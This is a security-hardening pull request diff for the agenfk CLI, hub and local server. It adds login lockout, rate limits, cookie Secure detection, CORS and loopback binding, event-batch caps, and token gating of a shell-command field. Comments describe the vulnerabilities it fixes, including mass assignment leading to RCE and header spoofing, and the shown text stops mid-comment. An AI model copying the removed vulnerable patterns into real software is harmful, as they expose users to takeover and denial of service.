### PR TITLE
close(security): full-scan hardening — 14 findings (1 crit/7 high/4 med/2 low) [EPIC 4c3c2018]

### DIFF
--- a/packages/cli/src/index.ts
+++ b/packages/cli/src/index.ts
@@ -1512,15 +1512,33 @@ program
       const updates: Record<string, unknown> = {};
       if (options.name !== undefined) updates.name = options.name;
       if (options.description !== undefined) updates.description = options.description;
-      if (options.verifyCommand !== undefined) updates.verifyCommand = options.verifyCommand;
-      if (Object.keys(updates).length === 0) {
+      if (options.verifyCommand === undefined && Object.keys(updates).length === 0) {
         console.error(chalk.yellow('Nothing to update. Pass at least one of --name, --description, --verify-command.'));
         process.exit(1);
         return;
       }
-      const { data } = await axios.put(`${API_URL}/projects/${id}`, updates);
+      let data: unknown;
+      if (Object.keys(updates).length > 0) {
+        ({ data } = await axios.put(`${API_URL}/projects/${id}`, updates));
+      }
+      // verifyCommand is a privileged shell string — set it via the internal
+      // endpoint with the install-time token (mirrors `agenfk backup`).
+      if (options.verifyCommand !== undefined) {
+        const tokenPath = path.join(os.homedir(), '.agenfk', 'verify-token');
+        if (!fs.existsSync(tokenPath)) {
+          console.error(chalk.red('Error: ~/.agenfk/verify-token not found. Run npm run install:framework first.'));
+          process.exit(1);
+          return;
+        }
+        const token = fs.readFileSync(tokenPath, 'utf8').trim();
+        ({ data } = await axios.put(
+          `${API_URL}/projects/${id}/verify-command`,
+          { verifyCommand: options.verifyCommand },
+          { headers: { 'x-agenfk-internal': token } },
+        ));
+      }
       console.log(chalk.green(`✓ Project ${id} updated.`));
-      console.log(structuredOutput(data));
+      if (data !== undefined) console.log(structuredOutput(data));
     } catch (error: any) {
       console.error(chalk.red('Error updating project:'), error.response?.data?.error || error.message);
       process.exit(1);

--- a/packages/cli/src/test/cli-parity-commands.test.ts
+++ b/packages/cli/src/test/cli-parity-commands.test.ts
@@ -158,7 +158,11 @@ describe('agenfk update-project <id>', () => {
     expect(program.commands.map(c => c.name())).toContain('update-project');
   });
 
-  it('PUTs only the fields that were provided', async () => {
+  it('PUTs name/description on the open route and verifyCommand on the gated route', async () => {
+    // verifyCommand is privileged (shell string) → goes to the internal
+    // endpoint with the verify token, never the open PUT. (Security: bug e60e20aa.)
+    mockExistsSync.mockReturnValue(true);
+    mockReadFileSync.mockReturnValue('test-verify-token');
     mockedAxios.put.mockResolvedValue({ data: { id: 'proj-1', name: 'Renamed' } });
 
     await program.parseAsync([
@@ -167,12 +171,21 @@ describe('agenfk update-project <id>', () => {
       '--verify-command', 'npm test',
     ]);
 
+    // name → open route (no verifyCommand mixed in)
     expect(mockedAxios.put).toHaveBeenCalledWith(
       `${API}/projects/proj-1`,
-      { name: 'Renamed', verifyCommand: 'npm test' },
+      { name: 'Renamed' },
     );
-    const payload = mockedAxios.put.mock.calls[0][1] as Record<string, unknown>;
-    expect(payload).not.toHaveProperty('description');
+    const openPayload = mockedAxios.put.mock.calls[0][1] as Record<string, unknown>;
+    expect(openPayload).not.toHaveProperty('verifyCommand');
+    expect(openPayload).not.toHaveProperty('description');
+
+    // verifyCommand → gated route with the internal token header
+    expect(mockedAxios.put).toHaveBeenCalledWith(
+      `${API}/projects/proj-1/verify-command`,
+      { verifyCommand: 'npm test' },
+      { headers: { 'x-agenfk-internal': 'test-verify-token' } },
+    );
   });
 });
 

--- a/packages/hub/src/auth/oauth.ts
+++ b/packages/hub/src/auth/oauth.ts
@@ -1,7 +1,7 @@
 import { randomBytes } from 'crypto';
 import { Request, Response } from 'express';
 import { DB } from '../db.js';
-import { setSessionCookie, signSession } from './session.js';
+import { setSessionCookie, signSession, cookieSecure } from './session.js';
 import { recordLogin, UserRow } from './password.js';
 import { SessionPayload } from '../types.js';
 
@@ -32,7 +32,7 @@ export function checkEmailAllowlist(email: string, allowlistJson: string | null)
 export function issueOAuthState(res: Response): string {
   const state = randomBytes(24).toString('hex');
   res.cookie(OAUTH_STATE_COOKIE, state, {
-    httpOnly: true, sameSite: 'lax', secure: process.env.NODE_ENV === 'production',
+    httpOnly: true, sameSite: 'lax', secure: cookieSecure(res.req),
     maxAge: OAUTH_STATE_TTL_MS, path: '/',
   });
   return state;

--- a/packages/hub/src/auth/session.ts
+++ b/packages/hub/src/auth/session.ts
@@ -23,10 +23,26 @@ export function verifySession(token: string, secret: string): SessionPayload | n
   }
 }
 
+// Whether to mark auth cookies Secure. Tying this to NODE_ENV alone meant a
+// TLS-terminated staging hub (NODE_ENV !== 'production') set the session JWT
+// WITHOUT Secure, so a protocol downgrade could leak it. Derive from the actual
+// request protocol (req.secure / x-forwarded-proto) and an explicit override,
+// so any HTTPS-served deployment gets Secure. (Security: bug f3d62844.)
+export function cookieSecure(req?: Request): boolean {
+  const explicit = process.env.AGENFK_HUB_COOKIE_SECURE;
+  if (explicit === 'true') return true;
+  if (explicit === 'false') return false;
+  if (req) {
+    const xfp = (req.headers?.['x-forwarded-proto'] as string | undefined)?.split(',')[0]?.trim().toLowerCase();
+    if (req.secure || xfp === 'https') return true;
+  }
+  return process.env.NODE_ENV === 'production';
+}
+
 export function setSessionCookie(res: Response, token: string): void {
   res.cookie(SESSION_COOKIE, token, {
     httpOnly: true,
-    secure: process.env.NODE_ENV === 'production',
+    secure: cookieSecure(res.req),
     sameSite: 'lax',
     maxAge: SESSION_TTL_HOURS * 3600 * 1000,
     path: '/',

--- a/packages/hub/src/routes/auth.ts
+++ b/packages/hub/src/routes/auth.ts
@@ -15,6 +15,12 @@ import {
   setSessionCookie,
   signSession,
 } from '../auth/session.js';
+import { rateLimit, FailedAttemptTracker } from '../util/rateLimit.js';
+
+// Brute-force defences for password login (Security: bug 210b3d34):
+//  - per-IP rate limit so one source can't fire unlimited attempts
+//  - per-account lockout so a slow distributed attack still trips a wall
+const LOGIN_WINDOW_MS = 15 * 60 * 1000;
 
 interface AuthConfigRow {
   password_enabled: number;
@@ -24,6 +30,10 @@ interface AuthConfigRow {
 
 export function authRouter(ctx: HubServerContext): Router {
   const router = Router();
+  // Per-hub-instance state (not module-level) so each process/app has its own
+  // counters and tests stay isolated.
+  const loginRateLimit = rateLimit({ windowMs: LOGIN_WINDOW_MS, max: 20, message: 'Too many login attempts, try again later.' });
+  const loginFailures = new FailedAttemptTracker(/* maxFailures */ 5, LOGIN_WINDOW_MS, /* lockMs */ LOGIN_WINDOW_MS);
 
   router.get('/providers', async (_req: Request, res: Response) => {
     const cfg = await ctx.db.get<AuthConfigRow>(
@@ -38,24 +48,33 @@ export function authRouter(ctx: HubServerContext): Router {
     });
   });
 
-  router.post('/login', async (req: Request, res: Response) => {
+  router.post('/login', loginRateLimit, async (req: Request, res: Response) => {
     const { email, password } = req.body ?? {};
     if (typeof email !== 'string' || typeof password !== 'string') {
       return res.status(400).json({ error: 'email and password required' });
     }
 
+    // Account lockout: too many recent failures for this email → refuse without
+    // even hitting the password hash, regardless of source IP. (bug 210b3d34.)
+    if (loginFailures.isLocked(email)) {
+      return res.status(429).json({ error: 'Account temporarily locked due to repeated failed logins. Try again later.' });
+    }
+
     const user = await findUserByEmail(ctx.db, email);
 
     if (!user || !user.password_hash || !user.active) {
+      loginFailures.recordFailure(email);
       return res.status(401).json({ error: 'Invalid credentials' });
     }
     if (user.provider !== 'password') {
       return res.status(401).json({ error: `This account signs in with ${user.provider}` });
     }
     if (!verifyPassword(password, user.password_hash)) {
+      loginFailures.recordFailure(email);
       return res.status(401).json({ error: 'Invalid credentials' });
     }
 
+    loginFailures.clear(email);
     await recordLogin(ctx.db, user.id);
     const token = signSession({ userId: user.id, orgId: user.org_id, role: user.role }, ctx.config.sessionSecret);
     setSessionCookie(res, token);

--- a/packages/hub/src/routes/connect.ts
+++ b/packages/hub/src/routes/connect.ts
@@ -3,6 +3,7 @@ import { randomBytes, createHmac, timingSafeEqual } from 'crypto';
 import { HubServerContext } from '../server.js';
 import { requireSession, requireAdmin } from '../auth/session.js';
 import { issueApiKey } from '../auth/apiKey.js';
+import { rateLimit } from '../util/rateLimit.js';
 
 // Plug-and-play hub onboarding endpoints — see the STORY for context.
 //
@@ -14,6 +15,11 @@ import { issueApiKey } from '../auth/apiKey.js';
 const DEVICE_CODE_TTL_S = 600;        // 10 minutes
 const DEVICE_POLL_INTERVAL_S = 2;
 const INVITE_TTL_MS = 14 * 86400_000; // 14 days
+
+// /device/start is unauthenticated; without limits anyone can inflate the
+// device_codes table unbounded (and expired rows were never pruned). Cap the
+// pending backlog and rate-limit per IP. (Security: bug 72f8da10.)
+const MAX_PENDING_DEVICE_CODES = 1000;
 
 // Avoid look-alikes (0/O, 1/I, etc.) so users can read codes off a screen.
 const USER_CODE_ALPHABET = 'ABCDEFGHJKLMNPQRSTUVWXYZ23456789';
@@ -69,12 +75,26 @@ function verifyInviteToken(token: string, secret: string): { orgId: string; nonc
 
 export function connectRouter(ctx: HubServerContext): Router {
   const router = Router();
+  // Per-instance rate limiter (not module-level) — see auth.ts rationale.
+  const deviceStartRateLimit = rateLimit({ windowMs: 15 * 60 * 1000, max: 60, message: 'Too many device-code requests, slow down.' });
   const guard = requireSession(ctx.config.sessionSecret);
   const adminGuard = requireAdmin(ctx.config.sessionSecret);
 
   // ── Device-code flow ──────────────────────────────────────────────────────
 
-  router.post('/device/start', async (req: Request, res: Response) => {
+  router.post('/device/start', deviceStartRateLimit, async (req: Request, res: Response) => {
+    const nowIso = new Date().toISOString();
+    // Prune expired rows so the table self-cleans, then refuse if the pending
+    // backlog is already saturated (cheap DoS guard). (bug 72f8da10.)
+    await ctx.db.run('DELETE FROM device_codes WHERE expires_at < ?', [nowIso]);
+    const pending = await ctx.db.get<{ n: number }>(
+      'SELECT COUNT(*) AS n FROM device_codes WHERE approved_at IS NULL AND expires_at > ?',
+      [nowIso],
+    );
+    if (pending && Number(pending.n) >= MAX_PENDING_DEVICE_CODES) {
+      res.status(429).json({ error: 'Too many pending device codes, try again later.' });
+      return;
+    }
     const deviceCode = randomBytes(32).toString('base64url');
     let code = userCode();
     for (let i = 0; i < 5; i++) {

--- a/packages/hub/src/routes/events.ts
+++ b/packages/hub/src/routes/events.ts
@@ -84,8 +84,16 @@ export function eventsRouter(ctx: HubServerContext): Router {
   // accept anything malformed.
   const SEMVER_TAG_RE = /^v?\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/;
 
+  // Hard ceiling on events processed in a single /v1/events transaction.
+  const MAX_EVENTS_PER_BATCH = 500;
+
   router.post('/events', requireKey, async (req: Request, res: Response) => {
     const orgId = req.hubApiKey!.orgId;
+    // An installation-bound key may only post events for its OWN installation.
+    // Without this, any org key could stamp fleet:upgrade:* state or running
+    // versions for another installation (BOLA). Legacy org-wide keys (null
+    // installation_id) are exempt for backward compatibility. (Security: bug a7a448dc.)
+    const keyInstallation = req.hubApiKey!.installationId ?? null;
     const installationFromHeader = (req.headers['x-installation-id'] as string | undefined) ?? null;
     const headerVerRaw = (req.headers['x-agenfk-version'] as string | undefined) ?? null;
     const agenfkVersion = headerVerRaw && SEMVER_TAG_RE.test(headerVerRaw) ? headerVerRaw : null;
@@ -93,6 +101,12 @@ export function eventsRouter(ctx: HubServerContext): Router {
     const events: any[] = Array.isArray(body?.events) ? body.events : [];
     if (events.length === 0) {
       return res.status(400).json({ error: 'Body must contain a non-empty events array' });
+    }
+    // Bound the per-batch work: a single 10MB body could otherwise carry
+    // thousands of events processed inside one SQLite transaction, blocking
+    // every other writer (write-amplification DoS). (Security: bug 035a4736.)
+    if (events.length > MAX_EVENTS_PER_BATCH) {
+      return res.status(413).json({ error: `Too many events in one batch (max ${MAX_EVENTS_PER_BATCH})` });
     }
 
     const now = new Date().toISOString();
@@ -105,6 +119,7 @@ export function eventsRouter(ctx: HubServerContext): Router {
       for (const e of events) {
         if (!isValidEvent(e)) { rejected++; continue; }
         if (e.orgId !== orgId) { rejected++; continue; }
+        if (keyInstallation && e.installationId !== keyInstallation) { rejected++; continue; }
         if (e.type === 'tokens.logged') { skipped++; continue; }
         seenInstallations.add(e.installationId);
         const userKey = userKeyFor(e.actor);

--- a/packages/hub/src/test/security-hardening.test.ts
+++ b/packages/hub/src/test/security-hardening.test.ts
@@ -1,0 +1,172 @@
+/**
+ * Security hardening — EPIC 4c3c2018 (full-scan findings, 2026-06-27).
+ * Hub-side findings: 210b3d34, a7a448dc, 72f8da10, 035a4736, f3d62844.
+ */
+import { describe, it, expect, beforeEach, afterEach } from 'vitest';
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+import supertest from 'supertest';
+import { createHubApp } from '../server';
+import { issueApiKey } from '../auth/apiKey';
+import { createPasswordUser } from '../auth/password';
+import { cookieSecure } from '../auth/session';
+
+const TEST_DB = path.join(os.tmpdir(), `agenfk-hub-security-test-${process.pid}.sqlite`);
+const cleanup = () => {
+  for (const suffix of ['', '-wal', '-shm']) {
+    const f = TEST_DB + suffix;
+    if (fs.existsSync(f)) fs.unlinkSync(f);
+  }
+};
+
+const sampleEvent = (overrides: Partial<any> = {}) => ({
+  eventId: 'e-' + Math.random().toString(36).slice(2),
+  installationId: 'inst-1',
+  orgId: 'org',
+  occurredAt: '2026-05-03T10:00:00Z',
+  actor: { osUser: 'alice', gitName: 'Alice', gitEmail: 'alice@example.com' },
+  type: 'item.created',
+  projectId: 'p1',
+  itemId: 'i1',
+  payload: { title: 'demo' },
+  ...overrides,
+});
+
+describe('hub security hardening', () => {
+  let app: any;
+  let ctx: any;
+
+  beforeEach(async () => {
+    cleanup();
+    const out = await createHubApp({ dbPath: TEST_DB, secretKey: '0'.repeat(64), sessionSecret: 'sess', defaultOrgId: 'org' });
+    app = out.app;
+    ctx = out.ctx;
+  });
+
+  afterEach(async () => { await ctx.db.close(); cleanup(); });
+
+  // ── bug 210b3d34: login brute-force lockout ─────────────────────────────────
+  describe('bug 210b3d34: /auth/login lockout', () => {
+    it('locks an account after repeated failures and clears on success', async () => {
+      await createPasswordUser(ctx.db, 'org', 'victim@example.com', 'correct-horse', 'admin');
+      // 5 wrong attempts → still 401, then locked
+      for (let i = 0; i < 5; i++) {
+        const r = await supertest(app).post('/auth/login').send({ email: 'victim@example.com', password: 'wrong' });
+        expect(r.status).toBe(401);
+      }
+      const locked = await supertest(app).post('/auth/login').send({ email: 'victim@example.com', password: 'wrong' });
+      expect(locked.status).toBe(429);
+      // Even the CORRECT password is refused while locked.
+      const lockedCorrect = await supertest(app).post('/auth/login').send({ email: 'victim@example.com', password: 'correct-horse' });
+      expect(lockedCorrect.status).toBe(429);
+    });
+
+    it('a fresh account with the right password logs in (control)', async () => {
+      await createPasswordUser(ctx.db, 'org', 'good@example.com', 'correct-horse', 'admin');
+      const r = await supertest(app).post('/auth/login').send({ email: 'good@example.com', password: 'correct-horse' });
+      expect(r.status).toBe(200);
+      expect(r.headers['set-cookie']).toBeTruthy();
+    });
+  });
+
+  // ── bug a7a448dc: installationId bound to API key (BOLA) ─────────────────────
+  describe('bug a7a448dc: events bound to the key installation', () => {
+    it('rejects events whose installationId differs from an installation-bound key', async () => {
+      const token = await issueApiKey(ctx.db, 'org', 'bound', { installationId: 'inst-1' });
+      const r = await supertest(app).post('/v1/events')
+        .set('Authorization', `Bearer ${token}`)
+        .send({ events: [sampleEvent({ installationId: 'inst-2', eventId: 'spoof' })] });
+      expect(r.status).toBe(200);
+      expect(r.body.rejected).toBe(1);
+      expect(r.body.ingested).toBe(0);
+    });
+
+    it('accepts events for the key own installation', async () => {
+      const token = await issueApiKey(ctx.db, 'org', 'bound', { installationId: 'inst-1' });
+      const r = await supertest(app).post('/v1/events')
+        .set('Authorization', `Bearer ${token}`)
+        .send({ events: [sampleEvent({ installationId: 'inst-1', eventId: 'own' })] });
+      expect(r.body.ingested).toBe(1);
+      expect(r.body.rejected).toBe(0);
+    });
+
+    it('legacy org-wide keys (no bound installation) keep working', async () => {
+      const token = await issueApiKey(ctx.db, 'org', 'legacy');
+      const r = await supertest(app).post('/v1/events')
+        .set('Authorization', `Bearer ${token}`)
+        .send({ events: [sampleEvent({ installationId: 'inst-9', eventId: 'legacy-ok' })] });
+      expect(r.body.ingested).toBe(1);
+    });
+  });
+
+  // ── bug 035a4736: per-batch event cap ───────────────────────────────────────
+  describe('bug 035a4736: /v1/events per-batch cap', () => {
+    it('rejects a batch over the cap with 413', async () => {
+      const token = await issueApiKey(ctx.db, 'org', 'capped');
+      const events = Array.from({ length: 501 }, (_, i) => sampleEvent({ eventId: `big-${i}` }));
+      const r = await supertest(app).post('/v1/events').set('Authorization', `Bearer ${token}`).send({ events });
+      expect(r.status).toBe(413);
+      const countRow = await ctx.db.get('SELECT COUNT(*) AS c FROM events') as { c: number };
+      expect(countRow.c).toBe(0); // nothing written
+    });
+
+    it('accepts a batch at the cap', async () => {
+      const token = await issueApiKey(ctx.db, 'org', 'capped2');
+      const events = Array.from({ length: 500 }, (_, i) => sampleEvent({ eventId: `ok-${i}` }));
+      const r = await supertest(app).post('/v1/events').set('Authorization', `Bearer ${token}`).send({ events });
+      expect(r.status).toBe(200);
+      expect(r.body.ingested).toBe(500);
+    });
+  });
+
+  // ── bug 72f8da10: device-code pruning ───────────────────────────────────────
+  describe('bug 72f8da10: device-code flow prunes expired rows', () => {
+    it('deletes expired device_codes on /device/start', async () => {
+      await ctx.db.run(
+        'INSERT INTO device_codes (device_code, user_code, expires_at) VALUES (?, ?, ?)',
+        ['stale-device', 'OLD1-OLD2', '2000-01-01T00:00:00.000Z'],
+      );
+      const before = await ctx.db.get('SELECT COUNT(*) AS c FROM device_codes') as { c: number };
+      expect(before.c).toBe(1);
+
+      const r = await supertest(app).post('/hub/device/start').send({});
+      expect(r.status).toBe(200);
+      expect(r.body.deviceCode).toBeTruthy();
+
+      const stale = await ctx.db.get('SELECT 1 AS x FROM device_codes WHERE device_code = ?', ['stale-device']);
+      expect(stale).toBeFalsy(); // expired row was pruned
+    });
+  });
+});
+
+// ── bug f3d62844: cookie Secure derives from request protocol, not NODE_ENV ───
+describe('bug f3d62844: cookieSecure', () => {
+  const prevEnv = process.env.NODE_ENV;
+  const prevExplicit = process.env.AGENFK_HUB_COOKIE_SECURE;
+  afterEach(() => {
+    process.env.NODE_ENV = prevEnv;
+    if (prevExplicit === undefined) delete process.env.AGENFK_HUB_COOKIE_SECURE;
+    else process.env.AGENFK_HUB_COOKIE_SECURE = prevExplicit;
+  });
+
+  it('is true when the request arrived over HTTPS (x-forwarded-proto), even off-prod', () => {
+    process.env.NODE_ENV = 'staging';
+    delete process.env.AGENFK_HUB_COOKIE_SECURE;
+    expect(cookieSecure({ headers: { 'x-forwarded-proto': 'https' } } as any)).toBe(true);
+    expect(cookieSecure({ secure: true, headers: {} } as any)).toBe(true);
+  });
+
+  it('honours the explicit override either way', () => {
+    process.env.AGENFK_HUB_COOKIE_SECURE = 'true';
+    expect(cookieSecure(undefined)).toBe(true);
+    process.env.AGENFK_HUB_COOKIE_SECURE = 'false';
+    expect(cookieSecure({ secure: true, headers: {} } as any)).toBe(false);
+  });
+
+  it('falls back to false for a plaintext non-prod request (local dev still works)', () => {
+    process.env.NODE_ENV = 'development';
+    delete process.env.AGENFK_HUB_COOKIE_SECURE;
+    expect(cookieSecure({ headers: { 'x-forwarded-proto': 'http' } } as any)).toBe(false);
+  });
+});

--- a/packages/hub/src/util/rateLimit.ts
+++ b/packages/hub/src/util/rateLimit.ts
@@ -1,0 +1,96 @@
+import { Request, Response, NextFunction } from 'express';
+
+// Dependency-free, in-memory rate limiting + brute-force lockout for the hub.
+// The hub is a single Node process backed by SQLite, so a per-process fixed
+// window is sufficient and avoids pulling a new package into a security PR.
+// (Security: bugs 210b3d34, 72f8da10.)
+
+/** Best-effort client IP. Honours the first x-forwarded-for hop (the hub runs
+ *  behind a reverse proxy in production) and falls back to the socket.
+ *  NOTE: this trusts x-forwarded-for, so the per-IP limiter is only sound when
+ *  a trusted proxy sets it. A directly-exposed hub lets a client spoof the
+ *  header for a fresh bucket each request — which is why the login defense's
+ *  real teeth are the IP-independent per-account lockout, and /device/start
+ *  also has an absolute pending-row cap. */
+export function clientIp(req: Request): string {
+  const fwd = req.headers['x-forwarded-for'];
+  const first = Array.isArray(fwd) ? fwd[0] : (fwd ?? '').toString().split(',')[0];
+  return (first.trim() || req.ip || req.socket?.remoteAddress || 'unknown').toString();
+}
+
+export interface RateLimitOptions {
+  windowMs: number;
+  max: number;
+  /** Bucket key; defaults to client IP. */
+  keyFn?: (req: Request) => string;
+  message?: string;
+}
+
+interface Window { count: number; resetAt: number; }
+
+/** Fixed-window per-key limiter. Returns 429 once `max` is exceeded within
+ *  `windowMs`. Stale windows are pruned lazily on each hit. */
+export function rateLimit(opts: RateLimitOptions) {
+  const { windowMs, max, keyFn = clientIp, message = 'Too many requests, slow down.' } = opts;
+  const windows = new Map<string, Window>();
+
+  return (req: Request, res: Response, next: NextFunction): void => {
+    const now = Date.now();
+    const key = keyFn(req);
+    // Opportunistic prune so the map can't grow unbounded under churn.
+    if (windows.size > 10_000) {
+      for (const [k, w] of windows) if (w.resetAt <= now) windows.delete(k);
+    }
+    let w = windows.get(key);
+    if (!w || w.resetAt <= now) {
+      w = { count: 0, resetAt: now + windowMs };
+      windows.set(key, w);
+    }
+    w.count++;
+    if (w.count > max) {
+      const retryAfter = Math.max(1, Math.ceil((w.resetAt - now) / 1000));
+      res.setHeader('Retry-After', String(retryAfter));
+      res.status(429).json({ error: message });
+      return;
+    }
+    next();
+  };
+}
+
+/** Per-account failed-attempt lockout. After `maxFailures` failures within
+ *  `windowMs`, `isLocked` reports true until the window elapses. Cleared on a
+ *  successful auth. Keys are lowercased so casing can't sidestep the lock. */
+export class FailedAttemptTracker {
+  private failures = new Map<string, { count: number; firstAt: number; lockUntil: number }>();
+  constructor(private maxFailures: number, private windowMs: number, private lockMs: number) {}
+
+  private norm(key: string): string { return key.trim().toLowerCase(); }
+
+  isLocked(key: string, now: number = Date.now()): boolean {
+    const e = this.failures.get(this.norm(key));
+    return !!e && e.lockUntil > now;
+  }
+
+  recordFailure(key: string, now: number = Date.now()): void {
+    // recordFailure fires for unknown emails too, so an attacker could otherwise
+    // seed unlimited distinct keys. Opportunistically drop entries whose window
+    // and lock have both elapsed before inserting a new one.
+    if (this.failures.size > 10_000) {
+      for (const [k2, e2] of this.failures) {
+        if (now - e2.firstAt > this.windowMs && e2.lockUntil <= now) this.failures.delete(k2);
+      }
+    }
+    const k = this.norm(key);
+    let e = this.failures.get(k);
+    if (!e || now - e.firstAt > this.windowMs) {
+      e = { count: 0, firstAt: now, lockUntil: 0 };
+      this.failures.set(k, e);
+    }
+    e.count++;
+    if (e.count >= this.maxFailures) {
+      e.lockUntil = now + this.lockMs;
+    }
+  }
+
+  clear(key: string): void { this.failures.delete(this.norm(key)); }
+}

--- a/packages/server/src/index.ts
+++ b/packages/server/src/index.ts
@@ -608,14 +608,22 @@ async function callToolHandler(request: any): Promise<any> {
         return { content: [{ type: "text", text: JSON.stringify(data, null, 2) }] };
       }
       case "update_project": {
-        const { id, ...updates } = z.object({
+        const { id, verifyCommand, ...updates } = z.object({
           id: z.string(),
           name: z.string().optional(),
           description: z.string().optional(),
           verifyCommand: z.string().optional(),
         }).parse(request.params.arguments);
-        const { data } = await api.put(`/projects/${id}`, updates);
-        return { content: [{ type: "text", text: JSON.stringify(data, null, 2) }] };
+        let data: unknown;
+        if (Object.keys(updates).length > 0) {
+          ({ data } = await api.put(`/projects/${id}`, updates));
+        }
+        // verifyCommand is privileged (shell string) — set it via the gated
+        // internal endpoint with the verify token. (Security: bug e60e20aa.)
+        if (verifyCommand !== undefined) {
+          ({ data } = await api.put(`/projects/${id}/verify-command`, { verifyCommand }, { headers: { 'x-agenfk-internal': VERIFY_TOKEN } }));
+        }
+        return { content: [{ type: "text", text: JSON.stringify(data ?? { id }, null, 2) }] };
       }
       case "log_test_result": {
         const { itemId, command, output, status } = z.object({ 

--- a/packages/server/src/server.ts
+++ b/packages/server/src/server.ts
@@ -28,15 +28,32 @@ export const VERIFY_TOKEN = (() => {
     return ephemeral;
   }
 })();
-import { exec, execSync, spawn } from "child_process";
+import { exec, execSync, execFileSync, spawn } from "child_process";
 import { createServer } from "http";
 import { Server } from "socket.io";
+
+// The local API server is for this machine only. It binds to loopback by
+// default (override with AGENFK_HOST) and only accepts browser requests from
+// localhost origins, so unauthenticated routes are neither LAN-reachable nor
+// drivable by a malicious page on another origin. (Security: bug 55229bae.)
+export const BIND_HOST = process.env.AGENFK_HOST || "127.0.0.1";
+
+// Allow requests with no Origin header (CLI, curl, same-origin, server-to-
+// server) and any loopback origin on any port (the UI dev server, previews).
+// Everything else is rejected — no wildcard.
+const LOCAL_ORIGIN_RE = /^https?:\/\/(localhost|127\.0\.0\.1|\[::1\])(:\d+)?$/i;
+export const isAllowedOrigin = (origin: string | undefined | null): boolean =>
+  !origin || LOCAL_ORIGIN_RE.test(origin);
+const corsOriginFn = (
+  origin: string | undefined,
+  cb: (err: Error | null, allow?: boolean) => void,
+): void => cb(null, isAllowedOrigin(origin));
 
 export const app = express();
 export const httpServer = createServer(app);
 export const io = new Server(httpServer, {
   cors: {
-    origin: "*",
+    origin: corsOriginFn,
     methods: ["GET", "POST"]
   }
 });
@@ -49,9 +66,9 @@ const REQUESTED_PORT = Number.parseInt(
 );
 
 app.use(cors({
-  origin: "*",
+  origin: corsOriginFn,
   methods: ["GET", "POST", "PUT", "DELETE", "OPTIONS"],
-  allowedHeaders: ["Content-Type", "Authorization"]
+  allowedHeaders: ["Content-Type", "Authorization", "x-agenfk-internal", "x-agenfk-ui"]
 }));
 app.use(bodyParser.json({ limit: '50mb' }));
 app.use(bodyParser.urlencoded({ limit: '50mb', extended: true }));
@@ -715,8 +732,40 @@ app.get("/projects/:id", asyncHandler(async (req: any, res: any) => {
 }));
 
 app.put("/projects/:id", asyncHandler(async (req: any, res: any) => {
+  // Allowlist the mutable fields. Passing req.body straight through let an
+  // unauthenticated caller overwrite verifyCommand (a shell string later run
+  // by validate_progress), projectRoot (its cwd) and flowId — mass assignment
+  // → RCE. verifyCommand has its own internal-only endpoint below; flowId has
+  // POST /projects/:id/flow. (Security: bug e60e20aa.)
+  const updates: Partial<{ name: string; description: string }> = {};
+  if (typeof req.body?.name === 'string') updates.name = req.body.name;
+  if (typeof req.body?.description === 'string') updates.description = req.body.description;
+  if (Object.keys(updates).length === 0) {
+    return res.status(400).json({ error: "Provide at least one of: name, description. (verifyCommand: PUT /projects/:id/verify-command; flowId: POST /projects/:id/flow)" });
+  }
   try {
-    const updated = await storage.updateProject(req.params.id, req.body);
+    const updated = await storage.updateProject(req.params.id, updates);
+    io.emit('items_updated');
+    res.json(updated);
+  } catch (error) {
+    res.status(404).json({ error: "Project not found" });
+  }
+}));
+
+// verifyCommand is a shell string executed by validate_progress on the final
+// step, so setting it is privileged. Gate it with the install-time secret like
+// /backup — only a local trusted caller (the CLI, which reads
+// ~/.agenfk/verify-token) may set it, never a browser or LAN peer. (bug e60e20aa.)
+app.put("/projects/:id/verify-command", asyncHandler(async (req: any, res: any) => {
+  if (req.headers['x-agenfk-internal'] !== VERIFY_TOKEN) {
+    return res.status(401).json({ error: "Unauthorized" });
+  }
+  const { verifyCommand } = req.body ?? {};
+  if (typeof verifyCommand !== 'string') {
+    return res.status(400).json({ error: "verifyCommand (string) required" });
+  }
+  try {
+    const updated = await storage.updateProject(req.params.id, { verifyCommand } as any);
     io.emit('items_updated');
     res.json(updated);
   } catch (error) {
@@ -838,17 +887,18 @@ app.post("/prs", asyncHandler(async (req: any, res: any) => {
     return res.status(400).json({ error: 'model and harness are required (your actual model id + harness; do not omit or copy an example)' });
   }
 
-  // POST /prs is idempotent on (repo, prNumber). Detect a re-registration BEFORE
-  // the upsert so we emit the right hub event: pr.opened only the first time, and
-  // pr.updated on subsequent calls — otherwise auto-register (agenfk pr create)
-  // followed by a manual pr-register would double-count the open.
-  const alreadyRegistered = await storage.getPrByRepoNumber(repo, prNumber);
-
+  // POST /prs is idempotent on (repo, prNumber). Newness is decided ATOMICALLY
+  // by the upsert, not by a separate pre-read: insertPr does INSERT … ON CONFLICT
+  // DO UPDATE without touching `id`, so the returned row keeps our freshly minted
+  // id only when this call won the insert. Two concurrent first-registrations
+  // therefore can't both see "not registered" and both emit pr.opened — exactly
+  // one wins the unique index. (Security: bug fe03d054.)
+  const newId = crypto.randomUUID();
   const shadow = await computeShadowSizing(itemId);
   const effectiveSizing = sizingProvided ? sizing : shadow;
   const now = new Date().toISOString();
   const pr = await storage.insertPr({
-    id: crypto.randomUUID(),
+    id: newId,
     prNumber,
     repo,
     itemId,
@@ -858,6 +908,7 @@ app.post("/prs", asyncHandler(async (req: any, res: any) => {
     sizingShadow: shadow,
     lastSizingCheckAt: now,
   });
+  const isNewRegistration = pr.id === newId;
 
   const matches =
     effectiveSizing.epic === shadow.epic && effectiveSizing.story === shadow.story
@@ -871,7 +922,7 @@ app.post("/prs", asyncHandler(async (req: any, res: any) => {
 
   const item = await storage.getItem(itemId);
   recordHubEvent({
-    type: alreadyRegistered ? 'pr.updated' : 'pr.opened',
+    type: isNewRegistration ? 'pr.opened' : 'pr.updated',
     projectId: item?.projectId,
     // model/harness are agent-declared (the CLI/MCP caller knows its own runtime;
     // the server process cannot infer them). Optional — omitted when not supplied.
@@ -1164,24 +1215,36 @@ app.post("/registry/flows/publish", asyncHandler(async (req: any, res: any) => {
     ? (registry as string).split('/')
     : [REGISTRY_OWNER, REGISTRY_REPO];
 
+  // registry is attacker-controllable and is interpolated into git/gh commands
+  // and URLs below. Validate to a GitHub-safe charset so it can never break out
+  // of an argument (combined with argv-form exec, no shell). (Security: bug 6d0a982f.)
+  // Must not start with '-' (GitHub names never do) so the value can't be read
+  // as a flag when passed as an argv element to gh/git. (Security: bug 6d0a982f.)
